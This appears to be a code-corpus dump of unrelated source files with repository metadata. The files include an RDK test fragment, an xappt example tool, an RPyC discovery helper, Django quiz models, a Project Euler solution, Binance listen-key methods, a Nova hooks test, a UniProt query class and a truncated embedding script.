logMsgs = ["ForceSyncCheck GET from DB failed","SyncCheckOK GET from DB failed"];
i=0;
for item in paramlist:
tdkTestObj = pamobj.createTestStep('pam_GetParameterValues');
tdkTestObj.addParameter("ParamName",item);
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase("expectedresult");
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip();
if expectedresult in actualresult:
print "Querying %s parameter is sucessfull" %item;
print "Check if DB failed message is seen on querying this specific parameter";
sleep(5);
tdkTestObj = sysobj.createTestStep('ExecuteCmd');
expectedresult="SUCCESS";
cmd= "cat /rdklogs/logs/WebConfig.log | grep -rn \"%s\" " %logMsgs[i];
print cmd;
expectedresult="SUCCESS";
tdkTestObj.addParameter("command", cmd);
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
i= i+1;
if expectedresult in actualresult and details:
tdkTestObj.setResultStatus("SUCCESS");
print"%s" %details;
print"The expected log message is present when Queried";
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print "The expected log message is not present: %s" %logMsgs[i];
print "[TEST EXECUTION RESULT] : FAILURE";
break;
else:
revert =0;
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Set Web Config Enable status to false";
print "EXPECTED RESULT 2: Should set Web Config Enable status to false";
print "ACTUAL RESULT 2: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
if revert ==1 :
tdkTestObj = pamobj.createTestStep('pam_SetParameterValues');
tdkTestObj.addParameter("ParamName","Device.X_RDK_WebConfig.RfcEnable");
tdkTestObj.addParameter("ParamValue",initial_value);
tdkTestObj.addParameter("Type","boolean");
expectedresult="SUCCESS";
#Execute testcase on DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
result = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Revert the Web Config Enable status to previous"
print "EXPECTED RESULT 3: Should revert Web Config status to previous"
print "ACTUAL RESULT 3: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Revert Web Config Enable status to previous"
print "EXPECTED RESULT 3: Should revert Web Config Enable status to previous"
print "ACTUAL RESULT 3: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1: Get current value of Web Config Enable"
print "EXPECTED RESULT 1: Should get current value of Web Config Enable"
print "ACTUAL RESULT 1: current value is %s" %initial_value;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
pamobj.unloadModule("pam");
sysobj.unloadModule("sysutil");
else:
print "Failed to load pam/sysutil module";
pamobj.setLoadModuleStatus("FAILURE");
sysobj.setLoadModuleStatus("FAILURE");
print "Module loading failed";
| 49.168182
| 194
| 0.665249
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6,422
| 0.593695
|
0b5a9a6d564a0a48f6482c88a286d5b324351dbc
| 3,283
|
py
|
Python
|
xappt_qt/plugins/tools/examples/auto_advance.py
|
cmontesano/xappt_qt
|
74f8c62e0104a67b4b4eb65382df851221bf0bab
|
[
"MIT"
] | null | null | null |
xappt_qt/plugins/tools/examples/auto_advance.py
|
cmontesano/xappt_qt
|
74f8c62e0104a67b4b4eb65382df851221bf0bab
|
[
"MIT"
] | 12
|
2020-10-11T22:42:12.000Z
|
2021-10-04T19:38:51.000Z
|
xappt_qt/plugins/tools/examples/auto_advance.py
|
cmontesano/xappt_qt
|
74f8c62e0104a67b4b4eb65382df851221bf0bab
|
[
"MIT"
] | 1
|
2021-09-29T23:53:34.000Z
|
2021-09-29T23:53:34.000Z
|
import time
import xappt
@xappt.register_plugin
class AutoAdvance(xappt.BaseTool):
message = xappt.ParamString(options={"ui": "label"})
next_iteration_advance_mode = xappt.ParamInt(choices=("no auto advance", "auto advance"))
def __init__(self, *, interface: xappt.BaseInterface, **kwargs):
super(AutoAdvance, self).__init__(interface=interface, **kwargs)
self.max_iterations = 5
self.auto_advance = bool(self.interface.tool_data.get('next_iteration_advance_mode', 0))
self.iteration = self.interface.tool_data.get("iteration", 1)
if self.iteration == self.max_iterations:
step = "last"
self.next_iteration_advance_mode.hidden = True
else:
step = xappt.humanize_ordinal(self.iteration)
self.message.value = f"This is the {step} of {self.max_iterations} iterations of this tool."
@classmethod
def name(cls) -> str:
return 'auto-advance'
@classmethod
def help(cls) -> str:
return ("When using a tool in the Qt interface, the default behavior is to leave the tool disabled "
"after a successful execution. Clicking **Next** or **Close** will move to the next tool or "
"close the interface.\n\nYou can set an attribute named `auto_advance`, and when it's set "
"to `True` the next tool will be automatically loaded (or the interface wil be closed) after "
"a successful execution.")
def message_label_text(self) -> str:
raise NotImplementedError
@classmethod
def collection(cls) -> str:
return "Examples"
def execute(self, **kwargs) -> int:
self.interface.progress_start()
for i in range(100):
progress = (i + 1) / 100.0
self.interface.progress_update(f"Iteration: {i + 1}/100", progress)
time.sleep(0.01)
self.interface.progress_end()
last_iteration = self.iteration == self.max_iterations
if last_iteration:
if self.auto_advance:
self.interface.message("Auto Advance is enabled for this iteration.\n\nOnce you click OK "
"on this message the interface will automatically exit.")
else:
self.interface.message("Auto Advance is disabled for this iteration.\n\nOnce you click OK "
"on this message, click the Close button to exit this interface.")
else:
self.interface.add_tool(AutoAdvance)
if self.auto_advance:
self.interface.message("Auto Advance is enabled for this iteration.\n\nOnce you click OK "
"on this message the next iteration will be automatically loaded.")
else:
self.interface.message("Auto Advance is disabled for this iteration.\n\nOnce you click OK "
"on this message click the Next button to continue to the next "
"iteration.")
self.interface.tool_data['iteration'] = self.iteration + 1
self.interface.tool_data['next_iteration_advance_mode'] = self.next_iteration_advance_mode.value
return 0
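# Usage note (an observation about this example, not extra API): the shared
# `interface.tool_data` dict is what carries 'iteration' and
# 'next_iteration_advance_mode' across the chained AutoAdvance instances,
# which is how each run knows which step it is on and whether to auto-advance.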
| 43.773333
| 110
| 0.616205
| 3,231
| 0.984161
| 0
| 0
| 3,254
| 0.991167
| 0
| 0
| 1,176
| 0.358209
|
0b5adb9041b96e89affef15661e25d3114bd15aa
| 962
|
py
|
Python
|
play-1.2.4/python/Lib/site-packages/Rpyc/Utils/Discovery.py
|
AppSecAI-TEST/restcommander
|
a2523f31356938f5c7fc6d379b7678da0b1e077a
|
[
"Apache-2.0"
] | 550
|
2015-01-05T16:59:00.000Z
|
2022-03-20T16:55:25.000Z
|
framework/python/Lib/site-packages/Rpyc/Utils/Discovery.py
|
lafayette/JBTT
|
94bde9d90abbb274d29ecd82e632d43a4320876e
|
[
"MIT"
] | 15
|
2015-02-05T06:00:47.000Z
|
2018-07-07T14:34:04.000Z
|
framework/python/Lib/site-packages/Rpyc/Utils/Discovery.py
|
lafayette/JBTT
|
94bde9d90abbb274d29ecd82e632d43a4320876e
|
[
"MIT"
] | 119
|
2015-01-08T00:48:24.000Z
|
2022-01-27T14:13:15.000Z
|
"""
Discovery: broadcasts a query, attempting to discover all running RPyC servers
over the local network/specific subnet.
"""
import socket
import select
import struct
__all__ = ["discover_servers"]
UDP_DISCOVERY_PORT = 18813
QUERY_MAGIC = "RPYC_QUERY"
MAX_DGRAM_SIZE = 100
def discover_servers(subnet = "255.255.255.255", timeout = 1):
"""broadcasts a query and returns a list of (addr, port) of running servers"""
# broadcast
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.sendto(QUERY_MAGIC, (subnet, UDP_DISCOVERY_PORT))
# wait for replies
replies = []
while True:
rlist, dummy, dummy = select.select([s], [], [], timeout)
if not rlist:
break
data, (addr, port) = s.recvfrom(MAX_DGRAM_SIZE)
rpyc_port, = struct.unpack("<H", data)
replies.append((addr, rpyc_port))
return list(set(replies))
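# Usage sketch (assumes an RPyC server is answering discovery broadcasts on
# UDP_DISCOVERY_PORT; Python 2 era code, matching the rest of this module):
#
#   from Rpyc.Utils.Discovery import discover_servers
#   for addr, port in discover_servers(timeout=2):
#       print "found RPyC server at %s:%d" % (addr, port)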
| 24.666667
| 82
| 0.672557
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 284
| 0.295218
|
0b5cea9d906ea2c35bda5ccee23fdca482e7e9b4
| 335
|
py
|
Python
|
atest/testresources/testlibs/objecttoreturn.py
|
userzimmermann/robotframework
|
7aa16338ce2120cb082605cf548c0794956ec901
|
[
"Apache-2.0"
] | 7
|
2015-02-25T10:55:02.000Z
|
2015-11-04T03:20:05.000Z
|
atest/testresources/testlibs/objecttoreturn.py
|
userzimmermann/robotframework
|
7aa16338ce2120cb082605cf548c0794956ec901
|
[
"Apache-2.0"
] | 12
|
2015-02-24T17:00:06.000Z
|
2015-07-31T08:32:07.000Z
|
atest/testresources/testlibs/objecttoreturn.py
|
userzimmermann/robotframework
|
7aa16338ce2120cb082605cf548c0794956ec901
|
[
"Apache-2.0"
] | 2
|
2015-12-15T11:00:35.000Z
|
2018-02-24T18:11:24.000Z
|
try:
import exceptions
except ImportError: # Python 3
import builtins as exceptions
class ObjectToReturn:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
def exception(self, name, msg=""):
exception = getattr(exceptions, name)
raise exception(msg)
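# Example: ObjectToReturn("x").exception("ValueError", "boom") looks ValueError
# up by name (in `exceptions` on Python 2, `builtins` on Python 3) and raises
# ValueError("boom").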
| 19.705882
| 45
| 0.647761
| 241
| 0.719403
| 0
| 0
| 0
| 0
| 0
| 0
| 12
| 0.035821
|
0b5db17336f788ad1d51e0ebfedab480c4c72a7e
| 2,068
|
py
|
Python
|
quiz/models.py
|
jzi040941/django_quiz
|
465d29c74e3ff6814f686296d225f18a50c99b9a
|
[
"MIT"
] | 1
|
2018-03-14T16:43:00.000Z
|
2018-03-14T16:43:00.000Z
|
quiz/models.py
|
jzi040941/django_quiz
|
465d29c74e3ff6814f686296d225f18a50c99b9a
|
[
"MIT"
] | null | null | null |
quiz/models.py
|
jzi040941/django_quiz
|
465d29c74e3ff6814f686296d225f18a50c99b9a
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class quiz_short(models.Model):
AssignNum = models.ForeignKey('teacher.Assignment', on_delete=models.CASCADE)
Question = models.TextField()
Answer = models.TextField()
def __str__(self):
return "AssignNum : %s, question: %s Answer: %s" % (self.AssignNum, self.Question, self.Answer)
class quiz_one(models.Model):
AssignNum = models.ForeignKey('teacher.Assignment', on_delete=models.CASCADE)
Question = models.TextField()
# Check = models.CharField(max_length=7, choices=CHECK_LIST)
Check = models.IntegerField(null=True,blank=True)
'''
Check_1 = models.BooleanField()
Check_2 = models.BooleanField()
Check_3 = models.BooleanField()
Check_4 = models.BooleanField()
'''
Selection_1 = models.TextField()
Selection_2 = models.TextField()
Selection_3 = models.TextField()
Selection_4 = models.TextField()
def __str__(self):
return "AssignNum : %s, question: %s Selection_1: %s" % (self.AssignNum, self.Question, self.Selection_1)
'''
class quiz_one(models.Model):
AssignNum = models.ForeignKey('teacher.Assignment', on_delete=models.CASCADE)
Question = models.TextField()
Answer = models.TextField()
Wrong_1 = models.TextField()
Wrong_2 = models.TextField()
Wrong_3 = models.TextField()
def __str__(self):
return "AssignNum : %s, question: %s Answer: %s" % (self.AssignNum, self.Question, self.Answer)
'''
class quiz_multi(models.Model):
AssignNum = models.ForeignKey('teacher.Assignment', on_delete=models.CASCADE)
Question = models.TextField()
Check_1 = models.BooleanField()
Check_2 = models.BooleanField()
Check_3 = models.BooleanField()
Check_4 = models.BooleanField()
Selection_1 = models.TextField()
Selection_2 = models.TextField()
Selection_3 = models.TextField()
Selection_4 = models.TextField()
def __str__(self):
return "AssignNum : %s, question: %s Selection_1: %s" % (self.AssignNum, self.Question, self.Selection_1)
| 35.655172
| 113
| 0.696325
| 1,593
| 0.770309
| 0
| 0
| 0
| 0
| 0
| 0
| 848
| 0.410058
|
0b5e2ce14cd1b7d0c4bdab1dbcbd6268fb51f4f1
| 165
|
py
|
Python
|
benchmark/VAR/GG/common.py
|
victor-estrade/SystGradDescent
|
822e7094290301ec47a99433381a8d6406798aff
|
[
"MIT"
] | 2
|
2019-03-20T09:05:02.000Z
|
2019-03-20T15:23:44.000Z
|
benchmark/VAR/GG/common.py
|
victor-estrade/SystGradDescent
|
822e7094290301ec47a99433381a8d6406798aff
|
[
"MIT"
] | null | null | null |
benchmark/VAR/GG/common.py
|
victor-estrade/SystGradDescent
|
822e7094290301ec47a99433381a8d6406798aff
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from __future__ import unicode_literals
| 27.5
| 39
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 15
| 0.090909
|
0b610800704e8c840fbc0a2a516adbeed8570f93
| 3,479
|
py
|
Python
|
problems/problem3.py
|
JakobHavtorn/euler
|
b5ca0b4393dc9a6d6e0623e0df5b96f803e116ab
|
[
"MIT"
] | null | null | null |
problems/problem3.py
|
JakobHavtorn/euler
|
b5ca0b4393dc9a6d6e0623e0df5b96f803e116ab
|
[
"MIT"
] | null | null | null |
problems/problem3.py
|
JakobHavtorn/euler
|
b5ca0b4393dc9a6d6e0623e0df5b96f803e116ab
|
[
"MIT"
] | null | null | null |
"""Largest prime factor
The prime factors of 13195 are 5, 7, 13 and 29.
What is the largest prime factor of the number 600851475143?
"""
import math
import numpy as np
def largest_prime_factor_naive(number):
"""
Let the given number be n and let k = 2, 3, 4, 5, ... .
For each k, if it is a factor of n then we divide n by k and completely divide out each k before moving to the next k.
It can be seen that when k is a factor it will necessarily be prime, as all smaller factors have been removed,
and the final result of this process will be n = 1.
"""
factor = 2
factors = []
while number > 1:
if number % factor == 0:
factors.append(factor)
            number = number // factor # Remainder guaranteed to be zero
            while number % factor == 0:
                number = number // factor # Remainder guaranteed to be zero
factor += 1
return factors
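# Worked example, taken from the module docstring: 13195 = 5 * 7 * 13 * 29, so
# the call below returns the distinct prime factors in ascending order and the
# largest prime factor is 29.
assert largest_prime_factor_naive(13195) == [5, 7, 13, 29]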
def largest_prime_factor_even_optimized(number):
"""
We know that, excluding 2, there are no even prime numbers.
So we can step factor by 2 per iteration after having divided out all factors of 2.
"""
factors = []
factor = 2
if number % factor == 0:
number = number // factor
factors.append(factor)
while number % factor == 0:
number = number // factor
factor = 3
while number > 1:
if number % factor == 0:
factors.append(factor)
            number = number // factor # Remainder guaranteed to be zero
            while number % factor == 0:
                number = number // factor # Remainder guaranteed to be zero
factor += 2
return factors
def largest_prime_factor_square_optimized(number):
"""
Every number n has at most one prime factor greater than sqrt(n).
After dividing out a prime factor, we recompute the square root of the
remaining number and use it as the upper limit for the trial factor.
If factor exceeds this square root we know the remaining number is prime.
"""
factors = []
factor = 2
if number % factor == 0:
number = number // factor
factors.append(factor)
while number % factor == 0:
number = number // factor
factor = 3
max_factor = math.sqrt(number)
while number > 1 and factor <= max_factor:
if number % factor == 0:
factors.append(factor)
number = number // factor
while number % factor == 0:
number = number // factor
max_factor = math.sqrt(number)
factor += 2
return factors
def idx_sieve(length):
    """Static length sieve-based prime generator"""
    primes = []
    is_prime = np.array([True]*length)
    i = 2
    while i < length:
        if is_prime[i]:
            # Mark every multiple of i as composite. Note this also marks i
            # itself, so on the next pass is_prime[i] is False and the loop
            # falls through to i += 1 below.
            is_prime[np.arange(i, length, i)] = False
            primes.append(i)
        else:
            i += 1
    return primes
def prime_factor(n, primes):
i = 0
factors = []
while n != 1:
while (n % primes[i]) != 0:
i += 1
factors.append(primes[i])
n = n / primes[i]
return factors
if __name__ == '__main__':
number = 600851475143
print(largest_prime_factor_naive(number))
print(largest_prime_factor_even_optimized(number))
print(largest_prime_factor_square_optimized(number))
number = 600851475143
primes = idx_sieve(20000)
print(max(prime_factor(number, primes)))
| 28.516393
| 122
| 0.603334
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,163
| 0.334291
|
0b61cadfab29026982ee72c19310998fdc907aa6
| 1,312
|
py
|
Python
|
aio_binance/futures/usdt/api/methods/stream.py
|
GRinvest/aiobinance
|
49ce0bdf955d9fa9363c41eb9cec3da2f121e611
|
[
"MIT"
] | 5
|
2022-01-30T19:32:16.000Z
|
2022-03-12T15:00:13.000Z
|
aio_binance/futures/usdt/api/methods/stream.py
|
GRinvest/aio-binance-library
|
49ce0bdf955d9fa9363c41eb9cec3da2f121e611
|
[
"MIT"
] | null | null | null |
aio_binance/futures/usdt/api/methods/stream.py
|
GRinvest/aio-binance-library
|
49ce0bdf955d9fa9363c41eb9cec3da2f121e611
|
[
"MIT"
] | null | null | null |
class DataStream:
async def create_private_listen_key(self) -> dict:
"""**Create a ListenKey (USER_STREAM)**
Notes:
``POST /fapi/v1/listenKey``
See Also:
https://binance-docs.github.io/apidocs/futures/en/#start-user-data-stream-user_stream
"""
return await self._fetch(
'POST',
'create_private_listen_key',
'/fapi/v1/listenKey'
)
async def update_private_listen_key(self) -> dict:
"""**Ping/Keep-alive a ListenKey (USER_STREAM)**
Notes:
``PUT /fapi/v1/listenKey``
See Also:
https://binance-docs.github.io/apidocs/futures/en/#keepalive-user-data-stream-user_stream
"""
return await self._fetch(
'PUT',
'update_private_listen_key',
'/fapi/v1/listenKey'
)
async def delete_private_listen_key(self) -> dict:
"""**Close a ListenKey (USER_STREAM)**
Notes:
``DELETE /fapi/v1/listenKey``
See Also:
https://binance-docs.github.io/apidocs/futures/en/#close-user-data-stream-user_stream
"""
return await self._fetch(
'DELETE',
'delete_private_listen_key',
'/fapi/v1/listenKey'
)
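# Usage sketch (assumption: DataStream is mixed into a client class that
# provides the async `_fetch(method, name, path)` coroutine the methods above
# rely on):
#
#   key_reply = await client.create_private_listen_key()
#   await client.update_private_listen_key()   # periodic keep-alive
#   await client.delete_private_listen_key()   # close the stream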
| 29.155556
| 101
| 0.55564
| 1,310
| 0.998476
| 0
| 0
| 0
| 0
| 1,275
| 0.971799
| 843
| 0.64253
|
0b61d6924578e04d8bbfa01176c73eece0bd32ef
| 2,484
|
py
|
Python
|
nova/tests/test_hooks.py
|
bopopescu/zknova
|
8dd09199f5678697be228ffceeaf2c16f6d7319d
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/test_hooks.py
|
bopopescu/zknova
|
8dd09199f5678697be228ffceeaf2c16f6d7319d
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/test_hooks.py
|
bopopescu/zknova
|
8dd09199f5678697be228ffceeaf2c16f6d7319d
|
[
"Apache-2.0"
] | 1
|
2020-07-24T08:25:25.000Z
|
2020-07-24T08:25:25.000Z
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for hook customization."""
import stevedore
from nova import hooks
from nova import test
class SampleHookA(object):
name = "a"
def _add_called(self, op, kwargs):
called = kwargs.get('called', None)
if called is not None:
called.append(op + self.name)
def pre(self, *args, **kwargs):
self._add_called("pre", kwargs)
class SampleHookB(SampleHookA):
name = "b"
def post(self, rv, *args, **kwargs):
self._add_called("post", kwargs)
class MockEntryPoint(object):
def __init__(self, cls):
self.cls = cls
def load(self):
return self.cls
class HookTestCase(test.TestCase):
def _mock_load_plugins(self, iload, iargs, ikwargs):
return [
stevedore.extension.Extension('test_hook',
MockEntryPoint(SampleHookA), SampleHookA, SampleHookA()),
stevedore.extension.Extension('test_hook',
MockEntryPoint(SampleHookB), SampleHookB, SampleHookB()),
]
def setUp(self):
super(HookTestCase, self).setUp()
hooks.reset()
self.stubs.Set(stevedore.extension.ExtensionManager, '_load_plugins',
self._mock_load_plugins)
@hooks.add_hook('test_hook')
def _hooked(self, a, b=1, c=2, called=None):
return 42
def test_basic(self):
self.assertEqual(42, self._hooked(1))
mgr = hooks._HOOKS['test_hook']
self.assertEqual(2, len(mgr.extensions))
self.assertEqual(SampleHookA, mgr.extensions[0].plugin)
self.assertEqual(SampleHookB, mgr.extensions[1].plugin)
def test_order_of_execution(self):
called_order = []
self._hooked(42, called=called_order)
self.assertEqual(['prea', 'preb', 'postb'], called_order)
| 28.227273
| 78
| 0.654187
| 1,692
| 0.681159
| 0
| 0
| 95
| 0.038245
| 0
| 0
| 801
| 0.322464
|
0b6439e111fde6d2d72ca7b4f1a3a62557d36d00
| 8,850
|
py
|
Python
|
code/reasoningtool/kg-construction/QueryUniprot.py
|
andrewsu/RTX
|
dd1de262d0817f7e6d2f64e5bec7d5009a3a2740
|
[
"MIT"
] | 31
|
2018-03-05T20:01:10.000Z
|
2022-02-01T03:31:22.000Z
|
code/reasoningtool/kg-construction/QueryUniprot.py
|
andrewsu/RTX
|
dd1de262d0817f7e6d2f64e5bec7d5009a3a2740
|
[
"MIT"
] | 1,774
|
2018-03-06T01:55:03.000Z
|
2022-03-31T03:09:04.000Z
|
code/reasoningtool/kg-construction/QueryUniprot.py
|
andrewsu/RTX
|
dd1de262d0817f7e6d2f64e5bec7d5009a3a2740
|
[
"MIT"
] | 19
|
2018-05-10T00:43:19.000Z
|
2022-03-08T19:26:16.000Z
|
""" This module defines the class QueryUniprot which connects to APIs at
http://www.uniprot.org/uploadlists/, querying reactome pathways from uniprot id.
* map_enzyme_commission_id_to_uniprot_ids(ec_id)
Description:
map enzyme commission id to UniProt ids
Args:
ec_id (str): enzyme commission id, e.g., "ec:1.4.1.17"
Returns:
ids (set): a set of UniProt ids, or an empty set if no UniProt id can be obtained or the response
status code is not 200.
"""
__author__ = ""
__copyright__ = ""
__credits__ = []
__license__ = ""
__version__ = ""
__maintainer__ = ""
__email__ = ""
__status__ = "Prototype"
# import requests
# import requests_cache
from cache_control_helper import CacheControlHelper
import CachedMethods
import sys
import urllib.parse
import xmltodict
class QueryUniprot:
API_BASE_URL = "http://www.uniprot.org/uploadlists/"
TIMEOUT_SEC = 120
HANDLER_MAP = {
'map_enzyme_commission_id_to_uniprot_ids': 'uniprot/?query=({id})&format=tab&columns=id',
'get_protein': 'uniprot/{id}.xml'
}
@staticmethod
@CachedMethods.register
def uniprot_id_to_reactome_pathways(uniprot_id):
"""returns a ``set`` of reactome IDs of pathways associated with a given string uniprot ID
:param uniprot_id: a ``str`` uniprot ID, like ``"P68871"``
:returns: a ``set`` of string Reactome IDs
"""
payload = { 'from': 'ACC',
'to': 'REACTOME_ID',
'format': 'tab',
'query': uniprot_id }
contact = "stephen.ramsey@oregonstate.edu"
header = {'User-Agent': 'Python %s' % contact}
requests = CacheControlHelper()
try:
url = QueryUniprot.API_BASE_URL
res = requests.post(QueryUniprot.API_BASE_URL, data=payload, headers=header)
except requests.exceptions.Timeout:
print(url, file=sys.stderr)
print('Timeout in QueryUniprot for URL: ' + QueryUniprot.API_BASE_URL, file=sys.stderr)
return None
except KeyboardInterrupt:
sys.exit(0)
except BaseException as e:
print(url, file=sys.stderr)
print('%s received in QueryUniprot for URL: %s' % (e, url), file=sys.stderr)
return None
status_code = res.status_code
if status_code != 200:
print(QueryUniprot.API_BASE_URL, file=sys.stderr)
print('Status code ' + str(status_code) + ' for url: ' + QueryUniprot.API_BASE_URL, file=sys.stderr)
return None
# assert 200 == res.status_code
res_set = set()
for line in res.text.splitlines():
field_str = line.split("\t")[1]
if field_str != "To":
res_set.add(field_str)
return res_set
@staticmethod
def __access_api(handler):
api_base_url = 'http://www.uniprot.org'
url = api_base_url + '/' + handler
#print(url)
contact = "stephen.ramsey@oregonstate.edu"
header = {'User-Agent': 'Python %s' % contact}
requests = CacheControlHelper()
try:
res = requests.get(url, timeout=QueryUniprot.TIMEOUT_SEC, headers=header)
except requests.exceptions.Timeout:
print(url, file=sys.stderr)
print('Timeout in QueryUniprot for URL: ' + url, file=sys.stderr)
return None
except requests.exceptions.ChunkedEncodingError:
print(url, file=sys.stderr)
print('ChunkedEncodingError for URL: ' + url, file=sys.stderr)
return None
except BaseException as e:
print(url, file=sys.stderr)
print('%s received in QueryUniprot for URL: %s' % (e, url), file=sys.stderr)
return None
status_code = res.status_code
if status_code != 200:
print(url, file=sys.stderr)
print('Status code ' + str(status_code) + ' for url: ' + url, file=sys.stderr)
return None
return res.text
@staticmethod
def map_enzyme_commission_id_to_uniprot_ids(ec_id):
res_set = set()
if not isinstance(ec_id, str):
return res_set
ec_id_encoded = urllib.parse.quote_plus(ec_id)
handler = QueryUniprot.HANDLER_MAP['map_enzyme_commission_id_to_uniprot_ids'].format(id=ec_id_encoded)
res = QueryUniprot.__access_api(handler)
if res is not None:
res = res[res.find('\n')+1:]
for line in res.splitlines():
res_set.add(line)
return res_set
@staticmethod
def __get_entity(entity_type, entity_id):
if entity_id[:10] == 'UniProtKB:':
entity_id = entity_id[10:]
handler = QueryUniprot.HANDLER_MAP[entity_type].format(id=entity_id)
results = QueryUniprot.__access_api(handler)
entity = None
if results is not None:
obj = xmltodict.parse(results)
if 'uniprot' in obj.keys():
if 'entry' in obj['uniprot'].keys():
entity = obj['uniprot']['entry']
return entity
@staticmethod
def get_protein_gene_symbol(entity_id):
ret_symbol = "None"
if not isinstance(entity_id, str):
return ret_symbol
entity_obj = QueryUniprot.__get_entity("get_protein", entity_id)
if entity_obj is not None:
if 'gene' in entity_obj.keys():
if "name" in entity_obj["gene"].keys():
gene_name_obj = entity_obj["gene"]["name"]
if not type(gene_name_obj) == list:
gene_name_obj = [gene_name_obj]
for name_dict in gene_name_obj:
# print(name_dict)
if "primary" in name_dict.values() and "#text" in name_dict.keys():
ret_symbol = name_dict["#text"]
return ret_symbol
@staticmethod
def __get_name(entity_type, entity_id):
entity_obj = QueryUniprot.__get_entity(entity_type, entity_id)
name = "UNKNOWN"
if entity_obj is not None:
if 'protein' in entity_obj.keys():
if 'recommendedName' in entity_obj['protein'].keys():
if 'fullName' in entity_obj['protein']['recommendedName'].keys():
name = entity_obj['protein']['recommendedName']['fullName']
if isinstance(name, dict):
name = name['#text']
return name
@staticmethod
def get_protein_name(protein_id):
if not isinstance(protein_id, str):
return "UNKNOWN"
return QueryUniprot.__get_name("get_protein", protein_id)
@staticmethod
def get_citeable_accession_for_accession(accession_number):
res_acc = None
res_tab = QueryUniprot.__access_api("uniprot/" + accession_number + ".tab")
if res_tab is None:
return res_acc
res_lines = res_tab.splitlines()
if len(res_lines) > 1:
res_acc = res_lines[1].split("\t")[0]
return res_acc
if __name__ == '__main__':
print(QueryUniprot.get_citeable_accession_for_accession("P35354"))
print(QueryUniprot.get_citeable_accession_for_accession("A8K802"))
print(QueryUniprot.get_citeable_accession_for_accession("Q16876"))
# print(QueryUniprot.uniprot_id_to_reactome_pathways("P68871"))
# print(QueryUniprot.uniprot_id_to_reactome_pathways("Q16621"))
# print(QueryUniprot.uniprot_id_to_reactome_pathways("P09601"))
print(CachedMethods.cache_info())
print(QueryUniprot.map_enzyme_commission_id_to_uniprot_ids("ec:1.4.1.17")) # small results
print(QueryUniprot.map_enzyme_commission_id_to_uniprot_ids("ec:1.3.1.110")) # empty result
print(QueryUniprot.map_enzyme_commission_id_to_uniprot_ids("ec:1.2.1.22")) # large results
print(QueryUniprot.map_enzyme_commission_id_to_uniprot_ids("ec:4.4.1.xx")) # fake id
print(QueryUniprot.map_enzyme_commission_id_to_uniprot_ids("R-HSA-1912422")) # wrong id
print(QueryUniprot.get_protein_gene_symbol('UniProtKB:P20848'))
print(QueryUniprot.get_protein_gene_symbol("UniProtKB:P01358"))
print(QueryUniprot.get_protein_gene_symbol("UniProtKB:Q96P88"))
print(QueryUniprot.get_protein_name('UniProtKB:P01358'))
print(QueryUniprot.get_protein_name('UniProtKB:P20848'))
print(QueryUniprot.get_protein_name('UniProtKB:Q9Y471'))
print(QueryUniprot.get_protein_name('UniProtKB:O60397'))
print(QueryUniprot.get_protein_name('UniProtKB:Q8IZJ3'))
print(QueryUniprot.get_protein_name('UniProtKB:Q7Z2Y8'))
print(QueryUniprot.get_protein_name('UniProtKB:Q8IWN7'))
print(QueryUniprot.get_protein_name('UniProtKB:Q156A1'))
| 40.410959
| 116
| 0.63209
| 6,364
| 0.719096
| 0
| 0
| 6,052
| 0.683842
| 0
| 0
| 2,369
| 0.267684
|
0b649e46fb5914bfe7b320bbcd19fe8e80f42ef7
| 1,624
|
py
|
Python
|
code_trunk/emb.py
|
chris4540/DD2430-ds-proj
|
b876efabe949392b27a7ebd4afb2be623174e287
|
[
"MIT"
] | null | null | null |
code_trunk/emb.py
|
chris4540/DD2430-ds-proj
|
b876efabe949392b27a7ebd4afb2be623174e287
|
[
"MIT"
] | null | null | null |
code_trunk/emb.py
|
chris4540/DD2430-ds-proj
|
b876efabe949392b27a7ebd4afb2be623174e287
|
[
"MIT"
] | null | null | null |
import torch
from network.siamese import SiameseNet
from network.resnet import ResidualEmbNetwork
import os
import numpy as np
from utils.datasets import DeepFashionDataset
from torchvision.transforms import Compose
from torchvision.transforms import Resize
from torchvision.transforms import ToTensor
from torchvision.transforms import Normalize
from torch.utils.data import Subset
from torch.utils.data import DataLoader
from utils import extract_embeddings
import pickle
from cuml.manifold import TSNE
emb_net = ResidualEmbNetwork()
model = SiameseNet(emb_net)
trans = Compose(
[
Resize((224, 224)),
